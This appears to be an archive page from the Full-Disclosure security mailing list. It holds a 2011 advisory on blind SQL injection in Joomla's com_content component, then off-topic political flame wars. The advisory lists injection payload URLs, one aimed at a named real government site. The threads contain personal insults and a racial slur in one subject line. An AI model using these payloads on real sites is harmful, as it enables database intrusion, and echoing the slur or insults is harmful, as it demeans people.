The originator of this email is not liable for the transmission of the information contained in this communication. Or are they? Either way it's a pretty dull legal query and frankly one I'm not going to dwell on. But should you have nothing better to do, please feel free to ruminate on it, and please pass on any concrete conclusions should you find them. However, if you pass them on via email, be sure to include a disclaimer regarding liability for transmission.
In the event that the originator did not send this email to you, then please return it to us and attach a scanned-in picture of your mother's brother's wife wearing nothing but a kangaroo suit, and we will immediately refund you exactly half of what you paid for the can of Whiskas you bought when you went to Pets At Home yesterday.
We take no responsibility for non-receipt of this email because we are running Exchange 5.5 and everyone knows how glitchy that can be. In the event that you do get this message then please note that we take no responsibility for that either. Nor will we accept any liability, tacit or implied, for any damage you may or may not incur as a result of receiving, or not, as the case may be, from time to time, notwithstanding all liabilities implied or otherwise, ummm, hell, where was I...umm, no matter what happens, it is NOT, and NEVER WILL BE, OUR FAULT!
The comments and opinions expressed herein are my own and NOT those of my employer, who, if he knew I was sending emails and surfing the seamier side of the Internet, would cut off my manhood and feed it to me for afternoon tea.
Re: [Full-disclosure] Joomla Component (com_content) - Blind SQL Injection Vulnerability
Which version is this?
On Sat, Nov 12, 2011 at 12:35 AM, resea...@vulnerability-lab.com resea...@vulnerability-lab.com wrote:
Title: Joomla Component (com_content) - Blind SQL Injection Vulnerability
Date: 2011-11-11
References: http://www.vulnerability-lab.com/get_content.php?id=323
VL-ID: 323
Introduction: Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns[citation needed], stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. Joomla had been downloaded 23 million times. Between March 2007 and February 2011 there had been more than 21 million downloads. There are over 7,400 free and commercial extensions available from the official Joomla! Extension Directory and more available from other sources (Copy of the Vendor Website: http://en.wikipedia.org/wiki/Joomla!)
Abstract: A vulnerability laboratory researcher discovered a Blind SQL Injection vulnerability on the com_content component of the joomla CMS.
Status: Published
Exploitation-Technique: Remote
Severity: Critical
Details: A blind SQL Injection vulnerability was detected on the com_content component of the joomla CMS. The vulnerability allows an attacker (remote) to inject/execute own sql statements on the affected application dbms. Successful exploitation of the vulnerability can result in compromise of the affected application dbms.
Vulnerable Module(s): [+] com_content
Proof of Concept: The vulnerability can be exploited by remote attackers. For demonstration or reproduce ...
1: [Site]/joomla/index.php?option=com_contentview=archiveyear=1 [BSQLI]
2: [Site]/joomla/index.php?option=com_contentview=archiveyear=-1 or 1=1--
3: [Site]/joomla/index.php?option=com_contentview=archiveyear=-1 or 1=0--
[x] Demo : http://www.paul.house.gov/index.php?option=com_contentview=archiveyear=-1or 1=0--
Risk: The security risk of the blind sql injection vulnerability is estimated as critical.
Credits: E.Shahmohamadi (IRAN)
Disclaimer: The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab or its suppliers.
Copyright © 2011|Vulnerability-Lab
-- Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com Contact: ad...@vulnerability-lab.com or supp...@vulnerability-lab.com
Re: [Full-disclosure] [foofus-tools] discontinued?
Sounds like someone can't get enough flamewar. /eot
On Thu, Oct 27, 2011 at 4:20 PM, GloW - XD doo...@gmail.com wrote:
naw we fuckin hate windows it sucks.
On 27 October 2011 19:20, Kristen Eisenberg kristen.eisenb...@yahoo.com wrote:
Hi guys, well first of all thanx for building a tool like fgdump :) but i'm worried, since 2k8 there is no update and it would be very sad if it's discontinued... are you planning another release?
Kristen Eisenberg
Billige Flüge Marketing GmbH
Emanuelstr. 3, 10317 Berlin, Germany
Phone: +49 (33) 5310967
Email: utebachmeier at gmail.com
Site: http://flug.airego.de - Compare cheap flights
___ foofus-tools mailing list foofus-to...@lists.foofus.net http://lists.foofus.net/listinfo.cgi/foofus-tools-foofus.net
Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD
Funny, Anonymous' tagline seems to be either with us, or you're corrupt. Happens that everyone I know well wouldn't touch Anonymous with a barge pole. I may arguably be naive, but I'm certainly not corrupt. So it seems they're yet another pawn... Not that it's anything new, really.
On Mon, Oct 17, 2011 at 1:07 AM, Ryan Dewhurst ryandewhu...@gmail.com wrote:
http://www.linkedin.com/in/tommyryan
On Mon, Oct 17, 2011 at 12:05 AM, Jeffrey Walton noloa...@gmail.com wrote:
On Sun, Oct 16, 2011 at 6:56 PM, Ivan . ivan...@gmail.com wrote:
http://gawker.com/5850054/meet-the-guy-who-snitched-on-occupy-wall-street-to-the-fbi-and-nypd
Thomas Ryan is definitely not the brightest fellow in computer security: We have been heavily monitoring Occupy Wall Street, and Anonymous. Aaron Barr did similar, ruined the company he worked for (HBGary Federal) and lost his job in the process.
Jeff
Re: [Full-disclosure] [Full-flame-war] There used to be a security mailing list at this address.
Guess it all depends on who's topposting...
On Sat, Oct 15, 2011 at 6:27 AM, dave bl db.pub.m...@gmail.com wrote:
On 15 October 2011 14:11, Thor (Hammer of God) t...@hammerofgod.com wrote:
Haven't we made it to the point where top posting is OK? I mean, it works from a Ped Xing standpoint, why not here? It is REALLY that bad?
I thought this was a security mailing list not an exercise in how not to do it TM. Also, top-posting really isn't that big of a deal.
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
Yes, since humanity is a great success in a fragmented form. Not. Then again, there are those that believe the end of the world will come when man stops fighting with each other, so I suppose even culture and tradition are against me on this one. Fair enough, I don't quite care about the damage some are inflicting to themselves. Which brings us back to the 99% discussion; some seem they're doing some form of good by making us redact a few steps in the course of progress. On Fri, Oct 14, 2011 at 1:26 PM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: ...And what, exactly, gave the US the right to be there in the first place? Non existant WMD? Human rights? The US has to stop seeing themselves as international police. /ends miniature rant On Fri, Oct 14, 2011 at 7:28 AM, Mike Hale eyeronic.des...@gmail.comwrote: Obviously not. Again. They looked like they had weapons. The pilots weren't wondering...they were sure they saw weapons. They then engaged what appeared to be a clear threat to other US forces nearby. The pilots acted exactly as they should have, given the information presented to them. This was a war zone, not a country club. On Thu, Oct 13, 2011 at 11:23 PM, Jeffrey Walton noloa...@gmail.com wrote: On Fri, Oct 14, 2011 at 2:19 AM, Mike Hale eyeronic.des...@gmail.com wrote: Except that they weren't obviously unarmed. Not only where they not obviously unarmed, they appeared to be armed. Look at the 4 minute mark. That sure as shit looks like an RPG. The crew thought the group was armed. Ergo, they were cleared to engage. This wasn't a war crime...and the allegation that it was just makes people look ridiculous. Listen to yourself: we weren't sure if they were armed, so we killed them. Put yourself and your family in the shoes of the dead folks. Its not a comfortable place to be, is it? Jeff On Thu, Oct 13, 2011 at 11:05 PM, valdis.kletni...@vt.edu wrote: On Thu, 13 Oct 2011 22:44:44 PDT, Mike Hale said: Seriously! 
Think about the injustice of having American helicopters engage armed individuals shadowing American soldiers. Shooting at armed individuals is one thing. If it's civilians and Reuters employees who *aren't* obviously armed, it's something else. -- 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 -- 09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
Resorting to personal attacks? Nice. Technical skills in what? Running a wordpress blog? Defacing a website? Growing pot? I rarely publicise any materials, most of the time I just tell whoever is responsible to do a fix. I'm not really running after publicity, unlike you guys. Also note that I never said I'm a seasoned hacker... in fact, my occupation is quite on the opposite side of the spectrum... You also seem to know more than I do what the Ubuntu VM I have contains. But that must make all the difference! I mean, people that don't know qubits from bits shouldn't be allowed in such discussions (of course there's wikipedia...) On Fri, Oct 14, 2011 at 6:38 PM, Georgi Guninski gunin...@guninski.com wrote: Christian Sciberras, I have trouble judging your technical skills - all I have seen is bad smalltalk. Do you have any technical publications you can share so I can judge? btw, the best I found was you could reproduce a bug in a CMS and in addition you can't tell root from user password on vanilla ubuntu. -- joro On Fri, Oct 14, 2011 at 02:11:13AM +0200, Christian Sciberras wrote: So if they cause damage for profit that makes it ok? No. But it's certainly better than doing damage without profit. Making profit means that at the end of the day, the money's going to go somewhere further in the chain. Flattening a tower, for instance, or attacking the local bank that refused to give you a loan because of the time you spent in a cell, isn't as productive. Neither is it making a company lose clients/profit just because they decided they don't want you to use their services (as if you did have a right in the first place...). And yes I acknowledge the American public has a measure of responsibility in the situation too, human beings are by nature imperfect, but the largest share of responsibility lies with the names listed below. The largest share? I can see Ex-president Bush trying to sell you a bottle of beer for $10 dollars ($7 profit). Wait, I can't. 
That sort of thing has happened to me and I paid back every dime of it, most people are decent human beings and would do the same. Most people? I could have sworn 90% of the people in the NYC subway would thank $deity if you suddenly dropped dead so they could get things off you. Call me cynical, but I wouldn't trust anyone else in such cases, other than myself. Regarding that list of yours, great! Now we just need a little more effort. For each of those persons, please enlighten us as to what they did legally wrong. Of course, the people that landed in jail shouldn't be counted. The 99% protest is a modern one committed to change, it just can't right wrongs by pointing at jailed people. On Thu, Oct 13, 2011 at 11:35 PM, Laurelai laure...@oneechan.org wrote: On 10/13/2011 9:18 AM, Christian Sciberras wrote: I simply acknowledge the fact that some people work hard to get obscenely rich, but I just can't stand people that cause damage for the fun of it. So if they cause damage for profit that makes it ok? Yes, I stick for everyone that minds his business, instead of ruining others' for the fun of it. What bothers me is the fact that those hypocrites (protesters) are crying out loud against some people they're highly envious of with the excuse of the depression. Well, here's the news; the famous depression has been brought about by these same people! And yes I acknowledge the American public has a measure of responsibility in the situation too, human beings are by nature imperfect, but the largest share of responsibility lies with the names listed below. If someone above is collecting free money because of incentives for people to spend money (and which seem to work well), I can't blame him. Yes because trickle down theory worked *so* well How many times in your life have you paid back something you received by mistake and which wasn't yours? 
While I would foremost applaud anyone that would right such a wrong, I just can't ignore the fact that those people out there representing the 99% are big-time hypocrites. That sort of thing has happened to me and I paid back every dime of it, most people are decent human beings and would do the same. On a different argument, since you seem to know well enough how some of the 1% are doing immoral things, why don't you start by handing out names instead of talking air just as the 99% crowd has been doing up till now?
Alan Greenspan, chairman of US Federal Reserve 1987-2006
Mervyn King, governor of the Bank of England
Bill Clinton, former US president
Gordon Brown, prime minister
George W Bush, former US president
Senator Phil Gramm
Abby Cohen, Goldman Sachs chief US strategist
Kathleen Corbet, former CEO, Standard & Poor's
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
Yeah, let's just all ignore low insults. The world would be a much better place without them and whoever said them in the first place... On Fri, Oct 14, 2011 at 11:02 PM, Laurelai laure...@oneechan.org wrote: On 10/14/2011 2:25 PM, Christian Sciberras wrote: Resorting to personal attacks? Nice. Technical skills in what? Running a wordpress blog? Defacing a website? Growing pot? I rarely publicise any materials, most of the time I just tell whoever is responsible to do a fix. I'm not really running after publicity, unlike you guys. Also note that I never said I'm a seasoned hacker... in fact, my occupation is quite on the opposite side of the spectrum... You also seem to know more than I do what the Ubuntu VM I have contains. But that must make all the difference! I mean, people that don't know qubits from bits shouldn't be allowed in such discussions (of course there's wikipedia...) On Fri, Oct 14, 2011 at 6:38 PM, Georgi Guninski gunin...@guninski.com wrote: Christian Sciberras, I have trouble judging your technical skills - all I have seen is bad smalltalk. Do you have any technical publications you can share so I can judge? btw, the best I found was you could reproduce a bug in a CMS and in addition you can't tell root from user password on vanilla ubuntu. -- joro On Fri, Oct 14, 2011 at 02:11:13AM +0200, Christian Sciberras wrote: So if they cause damage for profit that makes it ok? No. But it's certainly better than doing damage without profit. Making profit means that at the end of the day, the money's going to go somewhere further in the chain. Flattening a tower, for instance, or attacking the local bank that refused to give you a loan because of the time you spent in a cell, isn't as productive. Neither is it making a company lose clients/profit just because they decided they don't want you to use their services (as if you did have a right in the first place...). 
And yes I acknowledge the American public has a measure of responsibility in the situation too, human beings are by nature imperfect, but the largest share of responsibility lies with the names listed below. The largest share? I can see Ex-president Bush trying to sell you a bottle of beer for $10 dollars ($7 profit). Wait, I can't. That sort of thing has happened to me and I paid back every dime of it, most people are decent human beings and would do the same. Most people? I could have sworn 90% of the people in the NYC subway would thank $deity if you suddenly dropped dead so they could get things off you. Call me cynical, but I wouldn't trust anyone else in such cases, other than myself. Regarding that list of yours, great! Now we just need a little more effort. For each of those persons, please enlighten us as to what they did legally wrong. Of course, the people that landed in jail shouldn't be counted. The 99% protest is a modern one committed to change, it just can't right wrongs by pointing at jailed people. On Thu, Oct 13, 2011 at 11:35 PM, Laurelai laure...@oneechan.org wrote: On 10/13/2011 9:18 AM, Christian Sciberras wrote: I simply acknowledge the fact that some people work hard to get obscenely rich, but I just can't stand people that cause damage for the fun of it. So if they cause damage for profit that makes it ok? Yes, I stick for everyone that minds his business, instead of ruining others' for the fun of it. What bothers me is the fact that those hypocrites (protesters) are crying out loud against some people they're highly envious of with the excuse of the depression. Well, here's the news; the famous depression has been brought about by these same people! And yes I acknowledge the American public has a measure of responsibility in the situation too, human beings are by nature imperfect, but the largest share of responsibility lies with the names listed below. 
If someone above is collecting free money because of incentives for people to spend money (and which seem to work well), I can't blame him. Yes because trickle down theory worked *so* well How many times in your life have you paid back something you received by mistake and which wasn't yours? While I would foremost applaud anyone that would right such a wrong, I just can't ignore the fact that those people out there representing the 99% are big-time hypocrites. That sort of thing has happened to me and I paid back every dime of it, most people are decent human beings and would do the same. On a different argument, since you seem to know well enough how some of the 1% are doing immoral things, why don't you start by handing out names instead of talking air just as the 99% crowd has been doing up till now? *Alan Greenspan, chairman of US Federal Reserve 1987
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
You think I'm biting that? Skinny and under-age is just about everything you could come up with. Congrats for creativity. Just because two of you decided you found common grounds for insult doesn't mean you're god-almighty-indisputably-right in every piece of shit you come up with. Did I mention it's shit? With that, I give you one, you have a point, I should have stopped responding ever since some guy decided to equate a couple dozen of people into America's 1%. Strange, thought security guys would have been better with numbers... On Sat, Oct 15, 2011 at 2:32 AM, Laurelai laure...@oneechan.org wrote: On 10/14/2011 6:32 PM, xD 0x41 wrote: Cristiano, please give me ten minutes, excuse me, but it's essential .. You really don't realise how much, you attack others when they post, NO MATTER what the topic... yet you are still wondering why so many people seem to despise your skinny little nerdy ass... well, nerdy isn't bad, but, you're a downright lookalike for Mr. Bean aka Rowan Atkinson. You could maybe do his stunts, too? You're the one who is usually abusing others, before the finality which is simply adults not responding, to the baby who's crying out for more arguments. You should stfu, and learn more, you assume to know all, in every post, you're the brain, yet you are lame, I looked everything up about you, and yes, go ahead, and setup a nice wordpress secure setting, php wise too, then yes, I'd maybe think you're at least a halfwit ;) Anyhow, you're basically a tr0ll, and, you seem to keep goading, even AFTER the others, have completely stopped responding to you, simply because, Laurelai was right, why would anyone want to keep up a thread which has now turned malign, as I foresaw a week ago, but, I did not think it would even make a week, People like you, keep inspiring the flame to burn brighter.. which to me, is nastier than any *abuse* names, which, you clearly have not counted how many times you have actually called others, some form of rude name/word/personal attack. 
Maybe when you GROW UP, and behave as an adult, then I would assume the list will start to hear you, even through the bs. Anyhow, I applaud you, for *coming out* as to say, I mean, putting your pic up, like that, mate, you could be a pornstar! what you doin online :P~~~bahahaha go back to grade.2 then repeat it, then move on... then, if you work out how to call 911, call someone who gives a shit. Idiotic kid, grow the hell up. xd-- // IND SEC CONSULTANT FOR Yep yep Security (simply coz it sounds good) YEP YEP for all your Hat attire needs! On 15 October 2011 08:57, Christian Sciberras uuf6...@gmail.com wrote: Yeah, let's just all ignore low insults. The world would be a much better place without them and whoever said them in the first place... On Fri, Oct 14, 2011 at 11:02 PM, Laurelai laure...@oneechan.org wrote: On 10/14/2011 2:25 PM, Christian Sciberras wrote: Resorting to personal attacks? Nice. Technical skills in what? Running a wordpress blog? Defacing a website? Growing pot? I rarely publicise any materials, most of the time I just tell whoever is responsible to do a fix. I'm not really running after publicity, unlike you guys. Also note that I never said I'm a seasoned hacker... in fact, my occupation is quite on the opposite side of the spectrum... You also seem to know more than I do what the Ubuntu VM I have contains. But that must make all the difference! I mean, people that don't know qubits from bits shouldn't be allowed in such discussions (of course there's wikipedia...) On Fri, Oct 14, 2011 at 6:38 PM, Georgi Guninski gunin...@guninski.com wrote: Christian Sciberras, I have trouble judging your technical skills - all I have seen is bad smalltalk. Do you have any technical publications you can share so I can judge? btw, the best I found was you could reproduce a bug in a CMS and in addition you can't tell root from user password on vanilla ubuntu. 
-- joro On Fri, Oct 14, 2011 at 02:11:13AM +0200, Christian Sciberras wrote: So if they cause damage for profit that makes it ok? No. But it's certainly better than doing damage without profit. Making profit means that at the end of the day, the money's going to go somewhere further in the chain. Flattening a tower, for instance, or attacking the local bank that refused to give you a loan because of the time you spent in a cell, isn't as productive. Neither is it making a company lose clients/profit just because they decided they don't want you to use their services (as if you did have a right in the first place...). And yes I acknowledge the American public has a measure of responsibility in the situation too, human beings are by nature imperfect, but the largest share of responsibility lies with the names listed below. The largest share? I can see Ex-president Bush trying to sell you a bottle of beer for $10 dollars ($7 profit
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
So, if in practice the 99% enjoy privileges a notch less than the 1%, where did the 99% go to? On Wed, Oct 12, 2011 at 7:52 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: I know that if I was starving to death and couldn't afford medical care for my children that I wouldn't be sitting around with a $500 camera editing my photos with $700 software on a $1000 computer. Nor would I be sitting around in my apartment all day posting my woes on the Internet while the REAL 99% are having the tax dollars used to support these people taken out of their check. And you know there is no way to know if they bought the items second hand or if they were donated/gifted to them.
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
I simply acknowledge the fact that some people work hard to get obscenely rich, but I just can't stand people that cause damage for the fun of it. Yes, I stick for everyone that minds his business, instead of ruining others' for the fun of it. What bothers me is the fact that those hypocrites (protesters) are crying out loud against some people they're highly envious of with the excuse of the depression. Well, here's the news; the famous depression has been brought about by these same people! If someone above is collecting free money because of incentives for people to spend money (and which seem to work well), I can't blame him. How many times in your life have you paid back something you received by mistake and which wasn't yours? While I would foremost applaud anyone that would right such a wrong, I just can't ignore the fact that those people out there representing the 99% are big-time hypocrites. On a different argument, since you seem to know well enough how some of the 1% are doing immoral things, why don't you start by handing out names instead of talking air just as the 99% crowd has been doing up till now? On Thu, Oct 13, 2011 at 2:32 PM, Laurelai laure...@oneechan.org wrote: On 10/13/2011 1:29 AM, Christian Sciberras wrote: So, if in practice the 99% enjoy privileges a notch less than the 1%, where did the 99% go to? On Wed, Oct 12, 2011 at 7:52 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: I know that if I was starving to death and couldn't afford medical care for my children that I wouldn't be sitting around with a $500 camera editing my photos with $700 software on a $1000 computer. Nor would I be sitting around in my apartment all day posting my woes on the Internet while the REAL 99% are having the tax dollars used to support these people taken out of their check. And you know there is no way to know if they bought the items second hand or if they were donated/gifted to them.
I would say that the life we have is significantly less than the 1% and pretending otherwise is just silly, the 1% have a majority of the money and power and have manipulated the system to give them even more at the expense of the 99%, it's gotten to the point where those in power are blatantly doing illegal and immoral things because they know they can get away with this. They quite literally destroyed the economy for the 99% just to make themselves a profit *and* they won't be held accountable for it. I don't care if someone is wealthy or even obscenely rich, what *does* bother me is to knowingly cause so much damage to the global economy for their own personal gain, that is just *insane* you are the first to complain about the cost of damages that people like lulzsec/antisec do but you don't blink an eye at the people who quite literally destroyed the economy...in fact you're sticking up for them.
Re: [Full-disclosure] Military: Computer Virus Wasn't Directed at Drones
Here's another lesson *you* should learn; read what others say twice if you can't understand it the first time. I don't remember the focus of the discussion was on the malware per se, but more about questioning competence behind the responsible people. On Thu, Oct 13, 2011 at 11:02 PM, andrew.wallace andrew.wall...@rocketmail.com wrote: The computer virus that hit the Pentagon's drone program last month was not directed at the military systems but was common malware used to steal log-ins and passwords used in online gaming, military officials said Wednesday. http://abcnews.go.com/Technology/wireStory/military-computer-virus-directed-drones-14725058 Lesson to learn, stop reading Wired magazine web site. --- Andrew Wallace Independent consultant www.n3td3v.org.uk
Re: [Full-disclosure] [OT] Obama said: American people understand that not everybody's been following the rules
So if they cause damage for profit that makes it ok? No. But it's certainly better than doing damage without profit. Making profit means that at the end of the day, the money's going to go somewhere further in the chain. Flattening a tower, for instance, or attacking the local bank that refused to give you a loan because of the time you spent in a cell, isn't as productive. Neither is it making a company lose clients/profit just because they decided they don't want you to use their services (as if you did have a right in the first place...). And yes I acknowledge the American public has a measure of responsibility in the situation too, human beings are by nature imperfect, but the largest share of responsibility lies with the names listed below. The largest share? I can see Ex-president Bush trying to sell you a bottle of beer for $10 dollars ($7 profit). Wait, I can't. That sort of thing has happened to me and I paid back every dime of it, most people are decent human beings and would do the same. Most people? I could have sworn 90% of the people in the NYC subway would thank $deity if you suddenly dropped dead so they could get things off you. Call me cynical, but I wouldn't trust anyone else in such cases, other than myself. Regarding that list of yours, great! Now we just need a little more effort. For each of those persons, please enlighten us as to what they did legally wrong. Of course, the people that landed in jail shouldn't be counted. The 99% protest is a modern one committed to change, it just can't right wrongs by pointing at jailed people. On Thu, Oct 13, 2011 at 11:35 PM, Laurelai laure...@oneechan.org wrote: On 10/13/2011 9:18 AM, Christian Sciberras wrote: I simply acknowledge the fact that some people work hard to get obscenely rich, but I just can't stand people that cause damage for the fun of it. So if they cause damage for profit that makes it ok? Yes, I stick for everyone that minds his business, instead of ruining others' for the fun of it. 
What bothers me is the fact that those hypocrites (protesters) are crying out loud against some people they're highly envious of with the excuse of the depression. Well, here's the news; the famous depression has been brought about by these same people! And yes I acknowledge the American public has a measure of responsibility in the situation too, human beings are by nature imperfect, but the largest share of responsibility lies with the names listed below. If someone above is collecting free money because of incentives for people to spend money (and which seem to work well), I can't blame him. Yes because trickle down theory worked *so* well How many times in your life have you paid back something you received by mistake and which wasn't yours? While I would foremost applaud anyone that would right such a wrong, I just can't ignore the fact that those people out there representing the 99% are big-time hypocrites. That sort of thing has happened to me and I paid back every dime of it, most people are decent human beings and would do the same. On a different argument, since you seem to know well enough how some of the 1% are doing immoral things, why don't you start by handing out names instead of talking air just as the 99% crowd has been doing up till now? 
Alan Greenspan, chairman of US Federal Reserve 1987-2006
Mervyn King, governor of the Bank of England
Bill Clinton, former US president
Gordon Brown, prime minister
George W Bush, former US president
Senator Phil Gramm
Abby Cohen, Goldman Sachs chief US strategist
Kathleen Corbet, former CEO, Standard & Poor's
Hank Greenberg, AIG insurance group
Andy Hornby, former HBOS boss
Steve Crawshaw, former B&B boss
Adam Applegarth, former Northern Rock boss
Dick Fuld, Lehman Brothers chief executive
Ralph Cioffi and Matthew Tannin
Lewis Ranieri
Joseph Cassano, AIG Financial Products
Chuck Prince, former Citi boss
Angelo Mozilo, Countrywide Financial
Stan O'Neal, former boss of Merrill Lynch
Jimmy Cayne, former Bear Stearns boss
Christopher Dodd, chairman, Senate banking committee (Democrat)
Geir Haarde, Icelandic prime minister
John Tiner, FSA chief executive, 2003-07
Oh yeah and let's not forget about this guy http://www.time.com/time/specials/packages/article/0,28804,1877351_1877350_1877337,00.html And while he is thankfully spending time in a prison cell, so many other names on this list go free, in fact a good chunk of them made a profit off of the disaster.
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
Darren's and indeed many other people's lame excuse is that they're too humble to be greedy. As if! If anything, most people are greedier than that 1%. The only difference is that people are bad at it, unlike that 1%. Just consider the fact that Average Joe would be just too happy to evade tax. Richer Joe, instead, might be doing the same with his $1bn business. In both cases, they're breaking the law. The occupy wallstreet movement is simply hypocrisy. Did I happen to mention that I'm far from rich? In the coming years, I'll be struggling to get my own drop of land. The only unfair part I see is people complaining while buying iPads and iCrap over Facebook, Twitter etc.. On Tue, Oct 11, 2011 at 6:07 PM, Jeffrey Walton noloa...@gmail.com wrote: On Tue, Oct 11, 2011 at 9:25 AM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: Chris - Empathy, guilt, and morals. Guilt being a major factor. The possibility was always there to make millions via evil means, but morals and knowing it would be hard to live with. The problem is not getting lots of money. That is the easy part. The issue is with living with yourself afterward. How about illegal? Check out the Hobbs Act [1]. I'm not making this crap up - the US has laws on the books for negatively affecting commerce (which the crash did), and using fear to peddle their warez (how financial institutions market their instruments). There's probably provisions in the PATRIOT Act, too. The last time I checked (about a year ago), the SEC had opened fewer than 100 civil investigations. No criminal investigations, despite the fact that some of the financial institutions created spurious ratings companies just to rate their instruments 'good'. 
Jeff [1] http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/131mcrm.htm On Tue, Oct 11, 2011 at 12:43 AM, Bob Dobbs bobd10...@gmail.com wrote: On Mon, Oct 10, 2011 at 10:57 AM, Jeffrey Walton noloa...@gmail.com wrote: Who are the real threats to the US: terrorists who try to dream up ways to do the US harm, or Corporate and Congress which does the US harm? I hate to contribute to an off-topic thread but you've successfully trolled me here: Congress has done FAR more harm to the US than terrorists over the last 10 years by just about every measure.
Re: [Full-disclosure] [OT] the nigger said: American people understand that not everybody's been following the rules
Regarding who's doing the most damage to US economy, I'll just say I won't comment. I take issue with the 1%/99% idea; ie, the excuse that some people deserve more just because they are allowed to lie - even if it makes them hypocrites. On Wed, Oct 12, 2011 at 9:40 AM, Jeffrey Walton noloa...@gmail.com wrote: On Wed, Oct 12, 2011 at 2:51 AM, Christian Sciberras uuf6...@gmail.com wrote: Darren's and indeed many other people's lame excuse is that they're too humble to be greedy. As if! It's not about greed - pursuit of wealth is fine. You just can't harm others while doing it. (Well, apparently you can in the US). One of the funniest things I ever read regarding Bin Laden's little war was a boycott of the US dollar to reduce reliance [on the dollar] and to harm the US economy [1]. Thought experiment: terrorist wanted to ruin the US economy. US Financial institutions threw the US (and world) economy into a recession (again). The US financial institutions responsible must be terrorist organizations. Thank {insert higher being here} that Bin Laden did not make a PAC contribution on 9/10. Jeff [1] http://www.nytimes.com/2010/01/30/world/middleeast/30binladen.html On Tue, Oct 11, 2011 at 6:07 PM, Jeffrey Walton noloa...@gmail.com wrote: On Tue, Oct 11, 2011 at 9:25 AM, Darren Martyn d.martyn.fulldisclos...@gmail.com wrote: Chris - Empathy, guilt, and morals. Guilt being a major factor. The possibility was always there to make millions via evil means, but morals and knowing it would be hard to live with. The problem is not getting lots of money. That is the easy part. The issue is with living with yourself afterward. How about illegal? Check out the Hobbs Act [1]. I'm not making this crap up - the US has laws on the books for negatively affecting commerce (which the crash did), and using fear to peddle their warez (how financial institutions market their instruments). There's probably provisions in the PATRIOT Act, too. 
The last time I checked (about a year ago), the SEC had opened fewer than 100 civil investigations. No criminal investigations, despite the fact that some of the financial institutions created spurious ratings companies just to rate their instruments 'good'. Jeff [1] http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/131mcrm.htm [SNIP]
Re: [Full-disclosure] Search and Seizure of Email
Well said! On Wed, Oct 12, 2011 at 5:16 PM, Daniel Sichel dani...@ponderosatel.com wrote: In fact, law enforcement officials don't even need a search warrant to access private emails. In point of fact, nobody does, although acquiring this access is clearly easier for law enforcement. One of the burdens that the freedom the Internet brings, is the freedom. Your email is out there, typically unencrypted, available to anyone who can snatch the packets off the wire, any ISP employee with appropriate read rights on a mail server. Take responsibility for your own email. Encrypt it if you must, but for heaven sakes, own the fact that it is publicly visible. If we do not take responsibility for our own email and whine about others reading it, then there will HAVE to be regulations by government to protect us. That's what government does. That's what it is SUPPOSED to do. So before we invite Godzilla to protect our email, how about we just man up and take responsibility ourselves? But that's just the idea of a bunch of dead white guys like Edmund Burke, John Adams and James Madison, and what do they know? Dan Sichel
Re: [Full-disclosure] Search and Seizure of Email
I think you meant there is no guarantee that email is encrypted. You don't know if a provider is actually encrypting your mail unless you're doing this yourself. That's why there is no push. On Wed, Oct 12, 2011 at 5:54 PM, Laurelai laure...@oneechan.org wrote: On 10/12/2011 10:33 AM, Christian Sciberras wrote: Well said! On Wed, Oct 12, 2011 at 5:16 PM, Daniel Sichel dani...@ponderosatel.com wrote: In fact, law enforcement officials don't even need a search warrant to access private emails. In point of fact, nobody does, although acquiring this access is clearly easier for law enforcement. One of the burdens that the freedom the Internet brings, is the freedom. Your email is out there, typically unencrypted, available to anyone who can snatch the packets off the wire, any ISP employee with appropriate read rights on a mail server. Take responsibility for your own email. Encrypt it if you must, but for heaven sakes, own the fact that it is publicly visible. If we do not take responsibility for our own email and whine about others reading it, then there will HAVE to be regulations by government to protect us. That's what government does. That's what it is SUPPOSED to do. So before we invite Godzilla to protect our email, how about we just man up and take responsibility ourselves? But that's just the idea of a bunch of dead white guys like Edmund Burke, John Adams and James Madison, and what do they know? Dan Sichel
Well there is no push to make snail-mail encrypted and let's face it most people's mailboxes don't have any sort of locking mechanisms and is available to anyone with two hands and the malicious intent to steal someone's mail however the US Gov needs a warrant to intercept your physical mail, why does it being online somehow make it different? Especially considering the US Postal service keeps threatening to shut down, and this is due to the increased popularity of *email*. Why this should be troubling is that they consider email somehow different than physical mail when it comes to privacy rights for no really good reason, and considering that one of the grievances we had with England in the time of the revolutionary war was the government intercepting mail for arbitrary reasons. This should make every American citizen's hair stand on end.
Re: [Full-disclosure] Wipe off, rub out, reappear...
